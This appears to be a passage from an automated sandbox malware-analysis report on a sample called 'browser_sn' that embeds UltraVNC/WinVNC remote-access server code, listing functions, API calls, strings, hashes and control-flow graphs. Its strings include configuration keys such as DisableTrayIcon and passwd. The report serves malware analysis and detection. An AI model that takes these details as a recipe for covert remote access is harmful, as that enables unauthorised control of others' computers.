                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
                                                                            • String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                                            • API String ID: 459429253-3399855497
                                                                            • Opcode ID: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
                                                                            • Instruction ID: 98c0157438aa20f2d2eeb4cac4a299ddb6944fe9c048568ad77d295eb043727a
                                                                            • Opcode Fuzzy Hash: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
                                                                            • Instruction Fuzzy Hash: 09A28D26608A8185EB90DF25C858BFE37B1FB85B9AF454232CE9D877A5DFB8D445C300

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
                                                                            • String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
                                                                            • API String ID: 1881659197-3751679782
                                                                            • Opcode ID: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                                            • Instruction ID: 988396a2c82cabdc96e26aef1a9f5134162db6eb3982b3bbb0d101ca312f8db1
                                                                            • Opcode Fuzzy Hash: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                                            • Instruction Fuzzy Hash: C1411C31A08E42C6EBA0DF11A8041A973A0FF49B9AF444575DEDE83BA4DFBCE449C740

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF6C2BEA01F
                                                                            • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF6C2BE9FB7
                                                                            • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF6C2BEA094
                                                                            • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF6C2BE9F7F
                                                                            • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF6C2BE9F3B
                                                                            • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF6C2BEA06F
                                                                            • vncservice.cpp : getusername error %d, xrefs: 00007FF6C2BEA04A
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
                                                                            • String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
                                                                            • API String ID: 3635673080-2232443292
                                                                            • Opcode ID: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                            • Instruction ID: 97652be3163646d7fd90ebe13b025095ab9cc54f862069256f5dd3ad90099760
                                                                            • Opcode Fuzzy Hash: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                            • Instruction Fuzzy Hash: 16414D25E0C98382EB80DF69F8402B963B1BF9674EF944471DE8DC2765DEBDE4498780

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 562 7ff6c2b89d00-7ff6c2b89d9b call 7ff6c2b829a0 565 7ff6c2b89db3-7ff6c2b89dc7 OpenSCManagerA 562->565 566 7ff6c2b89d9d 562->566 568 7ff6c2b89de0-7ff6c2b89e25 EnumServicesStatusA 565->568 569 7ff6c2b89dc9-7ff6c2b89dce 565->569 567 7ff6c2b89da0-7ff6c2b89db1 call 7ff6c2c38894 566->567 567->565 570 7ff6c2b89e2b-7ff6c2b89e36 GetLastError 568->570 571 7ff6c2b89fed-7ff6c2b89ffc CloseServiceHandle 568->571 573 7ff6c2b89dd0-7ff6c2b89dd4 call 7ff6c2c37914 569->573 574 7ff6c2b89dd9-7ff6c2b89ddb 569->574 570->571 576 7ff6c2b89e3c-7ff6c2b89e3f call 7ff6c2c371fc 570->576 577 7ff6c2b89ffe-7ff6c2b8a002 call 7ff6c2c37914 571->577 578 7ff6c2b8a007 571->578 573->574 575 7ff6c2b8a00b-7ff6c2b8a031 call 7ff6c2c37220 574->575 584 7ff6c2b89e44-7ff6c2b89e4e 576->584 577->578 578->575 584->571 586 7ff6c2b89e54-7ff6c2b89e8d EnumServicesStatusA 584->586 587 7ff6c2b89e93-7ff6c2b89e9a 586->587 588 7ff6c2b89fe5-7ff6c2b89fe8 call 7ff6c2c378d4 586->588 587->588 590 7ff6c2b89ea0 587->590 588->571 591 7ff6c2b89ea3-7ff6c2b89ea6 590->591 592 7ff6c2b89fe1 591->592 593 7ff6c2b89eac-7ff6c2b89ec5 OpenServiceA 591->593 592->588 593->592 594 7ff6c2b89ecb-7ff6c2b89edf QueryServiceConfigA 593->594 595 7ff6c2b89ee5-7ff6c2b89eee GetLastError 594->595 596 7ff6c2b89fc7-7ff6c2b89fdb CloseServiceHandle 594->596 595->596 597 7ff6c2b89ef4-7ff6c2b89f02 call 7ff6c2c371fc 595->597 596->591 596->592 597->596 600 7ff6c2b89f08-7ff6c2b89f1e QueryServiceConfigA 597->600 601 7ff6c2b89fbf-7ff6c2b89fc2 call 7ff6c2c378d4 600->601 602 7ff6c2b89f24-7ff6c2b89f8d call 7ff6c2b829a0 call 7ff6c2b89c80 call 7ff6c2b8a120 600->602 601->596 610 7ff6c2b89faf-7ff6c2b89fb4 602->610 611 7ff6c2b89f8f-7ff6c2b89fa8 call 7ff6c2c385e0 602->611 610->601 613 7ff6c2b89fb6-7ff6c2b89fba call 7ff6c2c37914 610->613 611->610 613->601
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
                                                                            • String ID:
                                                                            • API String ID: 3151975580-0
                                                                            • Opcode ID: 206915db20c792c327387590d73ad61a55f2024e8acff6b1f3143c7cd7f65b41
                                                                            • Instruction ID: ba535599351a8d29a55755d7e0b457b2745a3d3646493115d2a1075fa7feea2a
                                                                            • Opcode Fuzzy Hash: 206915db20c792c327387590d73ad61a55f2024e8acff6b1f3143c7cd7f65b41
                                                                            • Instruction Fuzzy Hash: C6918022B08A4289FB54DF61D4146ED33B1BB057ADF400636DEAE97B98DF78E509C340

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 308 7ff6c2ba8590-7ff6c2ba85de call 7ff6c2b83730 311 7ff6c2ba85e0-7ff6c2ba85e9 308->311 312 7ff6c2ba862f-7ff6c2ba8639 308->312 313 7ff6c2ba8612-7ff6c2ba861c 311->313 314 7ff6c2ba85eb-7ff6c2ba860e SendMessageA WaitForSingleObject 311->314 315 7ff6c2ba8645-7ff6c2ba864f 312->315 316 7ff6c2ba863b-7ff6c2ba863e 312->316 317 7ff6c2ba861e-7ff6c2ba8626 call 7ff6c2b94110 313->317 318 7ff6c2ba8628 313->318 314->313 319 7ff6c2ba8651-7ff6c2ba8656 call 7ff6c2c38bf4 315->319 320 7ff6c2ba865d-7ff6c2ba8664 315->320 316->315 317->318 318->312 319->320 322 7ff6c2ba8666-7ff6c2ba8688 call 7ff6c2b83730 320->322 323 7ff6c2ba869b-7ff6c2ba86a5 320->323 332 7ff6c2ba8694 322->332 333 7ff6c2ba868a-7ff6c2ba868d 322->333 324 7ff6c2ba86b3-7ff6c2ba86bd 323->324 325 7ff6c2ba86a7-7ff6c2ba86ac call 7ff6c2c378d4 323->325 330 7ff6c2ba86bf-7ff6c2ba86c4 call 7ff6c2c378d4 324->330 331 7ff6c2ba86cb-7ff6c2ba86d5 324->331 325->324 330->331 336 7ff6c2ba86d7 call 7ff6c2c378d4 331->336 337 7ff6c2ba86dc-7ff6c2ba86e6 331->337 332->323 333->332 336->337 338 7ff6c2ba86e8 call 7ff6c2c378d4 337->338 339 7ff6c2ba86ed-7ff6c2ba86f7 337->339 338->339 343 7ff6c2ba86fe-7ff6c2ba8704 339->343 344 7ff6c2ba86f9 call 7ff6c2c378d4 339->344 346 7ff6c2ba8706-7ff6c2ba870d 343->346 347 7ff6c2ba8757-7ff6c2ba8761 343->347 344->343 346->347 350 7ff6c2ba870f-7ff6c2ba8719 346->350 348 7ff6c2ba8763 call 7ff6c2c38bf4 347->348 349 7ff6c2ba8768-7ff6c2ba8772 347->349 348->349 352 7ff6c2ba8774-7ff6c2ba8779 call 7ff6c2c38bf4 349->352 353 7ff6c2ba877a-7ff6c2ba8782 349->353 354 7ff6c2ba8736-7ff6c2ba873e call 7ff6c2bea220 350->354 355 7ff6c2ba871b-7ff6c2ba8723 350->355 352->353 357 7ff6c2ba8790-7ff6c2ba87b3 353->357 358 7ff6c2ba8784-7ff6c2ba878b call 7ff6c2c37914 353->358 354->347 366 7ff6c2ba8740-7ff6c2ba8751 SendMessageA 354->366 355->347 367 7ff6c2ba8725-7ff6c2ba8734 355->367 364 7ff6c2ba87b5-7ff6c2ba87bb FreeLibrary 357->364 365 
7ff6c2ba87bc-7ff6c2ba87dc call 7ff6c2c378d4 * 2 357->365 358->357 364->365 373 7ff6c2ba87de-7ff6c2ba87e5 call 7ff6c2c37914 365->373 374 7ff6c2ba87ea-7ff6c2ba8896 DeleteObject call 7ff6c2c38bf4 DeleteObject call 7ff6c2c38bf4 DeleteObject call 7ff6c2c38bf4 DeleteObject call 7ff6c2c38bf4 365->374 366->347 367->347 367->354 373->374
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
                                                                            • String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
                                                                            • API String ID: 2172171234-2418058073
                                                                            • Opcode ID: fc85aa9d4cb6258011c7a359a753eb1dcec1c46ba5e9220cec0b0a70b71eb708
                                                                            • Instruction ID: e68241fd27fc06f722ed33b5842ea64f338f41330910e13a41d348e06adf2fe0
                                                                            • Opcode Fuzzy Hash: fc85aa9d4cb6258011c7a359a753eb1dcec1c46ba5e9220cec0b0a70b71eb708
                                                                            • Instruction Fuzzy Hash: 0E812735A09A8281FB84DF25D8942B83360FF85F8EF080631CE9D8BB95CFA9D455C310

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
                                                                            • String ID:

                                                                            Similarity
                                                                            • API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
                                                                            • String ID:

                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
                                                                            • String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s

                                                                            Similarity
                                                                            • API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
                                                                            • String ID: ?

                                                                            Similarity
                                                                            • API ID: CreateRect$AddressLibraryLoadProcmalloc
                                                                            • String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...

                                                                            Similarity
                                                                            • API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
                                                                            • String ID:

                                                                            Similarity
                                                                            • API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
                                                                            • String ID:

                                                                            Similarity
                                                                            • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                                                                            • String ID:

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ComputerLibraryLoadName
                                                                            • String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
                                                                            • API String ID: 2278097360-3189507618

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProcessWindow$CurrentFindMessagePostThread
                                                                            • String ID: WinVNC Tray Icon
                                                                            • API String ID: 2660421340-1071638575

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            • vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF6C2BA3502
                                                                            • vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF6C2BA3490
                                                                            • vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF6C2BA3429
                                                                            • vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF6C2BA33D9
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
                                                                            • API String ID: 1452528299-2001727811
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
                                                                            • String ID: <unavailable>
                                                                            • API String ID: 4131039871-1096956887
                                                                            APIs
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: connectgethostbynamehtonsinet_addr
                                                                            • String ID:
                                                                            • API String ID: 599670773-0
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _callnewh_errno$AllocHeapmalloc
                                                                            • String ID: bad allocation
                                                                            • API String ID: 3727741168-2104205924
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FindMessagePostWindow
                                                                            • String ID: WinVNC Tray Icon
                                                                            • API String ID: 2578315405-1071638575
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocketshutdown
                                                                            • String ID: vsocket.cpp : closing socket
                                                                            • API String ID: 572888783-2569437896
                                                                            APIs
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
Similarity
• API ID: selectsend
• String ID:
• API String ID: 2999949978-0
Similarity
• API ID: AllocHeap_callnewh_errno
• String ID:
• API String ID: 849339952-0
Similarity
• API ID: FreeLibraryMessageSend
• String ID:
• API String ID: 3583424976-0
Similarity
• API ID: closesocketsetsockoptshutdownsocket
• String ID:
• API String ID: 3513852771-0
Similarity
• API ID: setsockopt
• String ID:
• API String ID: 3981526788-0
Similarity
• API ID: CountTickselect
• String ID:
• API String ID: 2475007269-0
APIs
• Sleep.KERNEL32(?,?,?,00007FF6C2C437F7,?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19), ref: 00007FF6C2C43331
Similarity
• API ID: Sleep_errno
• String ID:
• API String ID: 1068366078-0
Similarity
• API ID: PrivateProfile$String$Write$Desktop$Threadwsprintf$FileModuleName$CloseCurrentErrorInputLastMessageOpen_errno_invalid_parameter_noinfo
• String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DSMPluginConfig$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission.$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
• API String ID: 634683900-3478490838
                                                                            • Opcode ID: c0da5432a45c180c4d05b08e85982c191f6fb8bb6e384a189232e8bead3bb55d
                                                                            • Instruction ID: 9da6559bba2392185f5dd4fa5a9903d6146090937865c7787f3c1e2ee749de70
                                                                            • Opcode Fuzzy Hash: c0da5432a45c180c4d05b08e85982c191f6fb8bb6e384a189232e8bead3bb55d
                                                                            • Instruction Fuzzy Hash: A9E2A661618A8BE5EB90CF64E8905E43370FB5474EF905032DA8DC7668DEBDE24ED780
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
